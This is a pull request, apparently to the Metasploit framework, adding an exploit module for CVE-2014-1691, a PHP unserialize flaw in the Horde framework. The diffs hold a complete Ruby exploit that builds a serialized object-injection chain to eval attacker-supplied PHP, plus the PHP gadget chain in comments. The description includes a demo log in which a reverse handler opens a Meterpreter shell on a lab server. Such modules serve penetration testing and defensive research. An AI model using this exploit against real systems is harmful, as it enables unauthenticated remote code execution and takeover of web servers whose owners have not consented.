### PR TITLE
Add module for CVE-2014-1691

### DIFF
--- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
@@ -83,8 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote
     payload_serialized << "a:1:{s:10:\"identities\";s:#{php_injection.length}:\"#{php_injection}\";}}"
     payload_serialized << "s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"
 
-    print_status(payload_serialized)
-
     send_request_cgi(
       {
         'uri'       => normalize_uri(target_uri.path.to_s, "login.php"),

--- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
@@ -1,0 +1,155 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Horde Unserialize PHP Code Execution',
+      'Description'    => %q{
+        This module exploits a php unserialize() vulnerability in Horde < 5.1.1 which could be
+        abused to allow unauthenticated users to execute arbitrary code with the permissions of
+        the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
+        The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
+        class to reach a dangerous call_user_func() call in the Horde_Prefs class. This exploit
+        uses the Horde_Date_Parser_Token class, which isn't installed by default, the package
+        Horde_Date_Parser must be installed in the target.
+      },
+      'Author'         =>
+        [
+          'EgiX', # Vulnerability discovery and PoC
+          'juan vazquez' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2014-1691' ],
+          [ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
+          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ]
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets'        => [ ['Horde 5', { }], ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 30 2014'
+      ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
+        ], self.class)
+  end
+
+  def check
+    addends = [rand(10000), rand(10000)]
+    sum = addends.inject{|sum,x| sum + x }
+    res = send_request_exploit("echo #{addends[0]} + #{addends[1]};die;")
+    if res and res.body and res.body.to_s =~ /#{sum}/
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{peer} - Testing injection...")
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
+    end
+
+    print_status("#{peer} - Exploiting the unserialize()...")
+    send_request_exploit(payload.encoded)
+  end
+
+  def send_request_exploit(p)
+    php_injection = "\"&&eval(base64_decode($_SERVER[HTTP_CMD]))==\""
+
+    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";O:20:\""
+    payload_serialized << "Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
+    payload_serialized << "a:2:{i:0;O:23:\"Horde_Date_Parser_Token\":1:{s:4:\"tags\";a:1:{i:0;s:1:\"A\";}}i:1;s:5:\"untag\";}}"
+    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";"
+    payload_serialized << "a:1:{s:#{php_injection.length}:\"#{php_injection}\";i:1;}}}}s:13:\"\x00*\x00_prefnames\";"
+    payload_serialized << "a:1:{s:10:\"identities\";s:#{php_injection.length}:\"#{php_injection}\";}}"
+    payload_serialized << "s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"
+
+    print_status(payload_serialized)
+
+    send_request_cgi(
+      {
+        'uri'       => normalize_uri(target_uri.path.to_s, "login.php"),
+        'method'    => 'POST',
+        'vars_post' => {
+          '_formvars' => payload_serialized
+        },
+        'headers' => {
+          'Cmd' => Rex::Text.encode_base64(p)
+        }
+      })
+  end
+end
+
+=begin
+PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection
+
+$phpcode = '"&&eval("phpinfo();die;")=="';
+ 
+class Horde_Date_Parser_Token
+{
+   public $tags = array('A');
+}
+ 
+class Horde_Prefs_Scope
+{
+   protected $_prefs;
+ 
+   function __construct()
+   {
+      $this->_prefs = array($GLOBALS['phpcode'] => 1);
+   }
+}
+ 
+class Horde_Prefs
+{
+   protected $_opts, $_scopes;
+ 
+   function __construct()
+   {
+      $this->_opts['sizecallback'] = array(new Horde_Date_Parser_Token, 'untag');
+      $this->_scopes['horde'] = new Horde_Prefs_Scope;
+   }
+}
+ 
+class Horde_Prefs_Identity
+{
+   protected $_prefs, $_prefnames;
+ 
+   function __construct()
+   {
+      $this->_prefs = new Horde_Prefs;
+      $this->_prefnames['identities'] = $GLOBALS['phpcode'];
+   }
+}
+ 
+class Horde_Kolab_Server_Decorator_Clean
+{
+   private $_server, $_added = array(1);
+ 
+   function __construct()
+   {
+      $this->_server = new Horde_Prefs_Identity;
+   }
+}
+  
+$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
+=end

--- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
@@ -94,56 +94,51 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 
 =begin
+
 PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection
 
-$phpcode = '"&&eval("phpinfo();die;")=="';
- 
-class Horde_Date_Parser_Token
+class Horde_Config
 {
-   public $tags = array('A');
+   protected $_oldConfig = "phpinfo();die;";
 }
- 
+
 class Horde_Prefs_Scope
 {
-   protected $_prefs;
- 
-   function __construct()
-   {
-      $this->_prefs = array($GLOBALS['phpcode'] => 1);
-   }
+   protected $_prefs = array(1);
 }
- 
+
 class Horde_Prefs
 {
-   protected $_opts, $_scopes;
- 
-   function __construct()
-   {
-      $this->_opts['sizecallback'] = array(new Horde_Date_Parser_Token, 'untag');
-      $this->_scopes['horde'] = new Horde_Prefs_Scope;
-   }
+   protected $_opts, $_scopes;
+
+   function __construct()
+   {
+      $this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
+      $this->_scopes['horde'] = new Horde_Prefs_Scope;
+   }
 }
- 
+
 class Horde_Prefs_Identity
 {
-   protected $_prefs, $_prefnames;
- 
-   function __construct()
-   {
-      $this->_prefs = new Horde_Prefs;
-      $this->_prefnames['identities'] = $GLOBALS['phpcode'];
-   }
+   protected $_prefs, $_prefnames;
+
+   function __construct()
+   {
+      $this->_prefs = new Horde_Prefs;
+      $this->_prefnames['identities'] = 0;
+   }
 }
- 
+
 class Horde_Kolab_Server_Decorator_Clean
 {
-   private $_server, $_added = array(1);
- 
-   function __construct()
-   {
-      $this->_server = new Horde_Prefs_Identity;
-   }
+   private $_server, $_added = array(1);
+
+   function __construct()
+   {
+      $this->_server = new Horde_Prefs_Identity;
+   }
 }
-  
+
 $popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
+
 =end

--- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Horde Unserialize PHP Code Execution',
+      'Name'           => 'Horde Framework Unserialize PHP Code Execution',
       'Description'    => %q{
         This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
         abused to allow unauthenticated users to execute arbitrary code with the permissions of

--- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
@@ -14,17 +14,15 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Horde Unserialize PHP Code Execution',
       'Description'    => %q{
-        This module exploits a php unserialize() vulnerability in Horde < 5.1.1 which could be
+        This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
         abused to allow unauthenticated users to execute arbitrary code with the permissions of
         the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
         The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
-        class to reach a dangerous call_user_func() call in the Horde_Prefs class. This exploit
-        uses the Horde_Date_Parser_Token class, which isn't installed by default, the package
-        Horde_Date_Parser must be installed in the target.
+        class to reach a dangerous call_user_func() call in the Horde_Prefs class.
       },
       'Author'         =>
         [
-          'EgiX', # Vulnerability discovery and PoC
+          'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
           'juan vazquez' # Metasploit module
         ],
       'License'        => MSF_LICENSE,
@@ -53,10 +51,9 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    addends = [rand(10000), rand(10000)]
-    sum = addends.inject{|sum,x| sum + x }
-    res = send_request_exploit("echo #{addends[0]} + #{addends[1]};die;")
-    if res and res.body and res.body.to_s =~ /#{sum}/
+    flag = rand_text_alpha(rand(10)+20)
+    res = send_request_exploit("print #{flag};die;")
+    if res and res.body and res.body.to_s =~ /#{flag}/
       return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe
@@ -73,15 +70,13 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def send_request_exploit(p)
-    php_injection = "\"&&eval(base64_decode($_SERVER[HTTP_CMD]))==\""
+    php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"
 
-    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";O:20:\""
-    payload_serialized << "Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
-    payload_serialized << "a:2:{i:0;O:23:\"Horde_Date_Parser_Token\":1:{s:4:\"tags\";a:1:{i:0;s:1:\"A\";}}i:1;s:5:\"untag\";}}"
-    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";"
-    payload_serialized << "a:1:{s:#{php_injection.length}:\"#{php_injection}\";i:1;}}}}s:13:\"\x00*\x00_prefnames\";"
-    payload_serialized << "a:1:{s:10:\"identities\";s:#{php_injection.length}:\"#{php_injection}\";}}"
-    payload_serialized << "s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"
+    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
+    payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
+    payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
+    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
+    payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"
 
     send_request_cgi(
       {

--- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
@@ -30,7 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'CVE', '2014-1691' ],
           [ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
-          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ]
+          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
+          [ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],
@@ -41,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets'        => [ ['Horde 5', { }], ],
       'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Jan 30 2014'
+      'DisclosureDate' => 'Jun 27 2013'
       ))
 
       register_options(


### PR DESCRIPTION
Module for Horde Framework Unserialize PHP Code Execution. 

Vulnerability and Exploitation details by EgiX available in http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection

Tested successfully on Horde 5.1.0 (Standard install, no additional packages) with Ubuntu 10.4.
## Verification
- [x] Install Horde 5, instructions here: http://www.horde.org/apps/horde/docs/INSTALL#installing-with-pear
- [x] Undo security patch, available here: https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3
- [x] Test the module like in the DEMO, hopefully enjoy session!
## DEMO

```
msf exploit(horde_unserialize_exec) > check
[+] 192.168.172.143:80 - The target is vulnerable.
msf exploit(horde_unserialize_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.143:80 - Testing injection...
[*] 192.168.172.143:80 - Exploiting the unserialize()...
[*] Sending stage (39848 bytes) to 192.168.172.143
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.143:53103) at 2014-03-18 16:07:24 -0500


^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
eComputer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

```
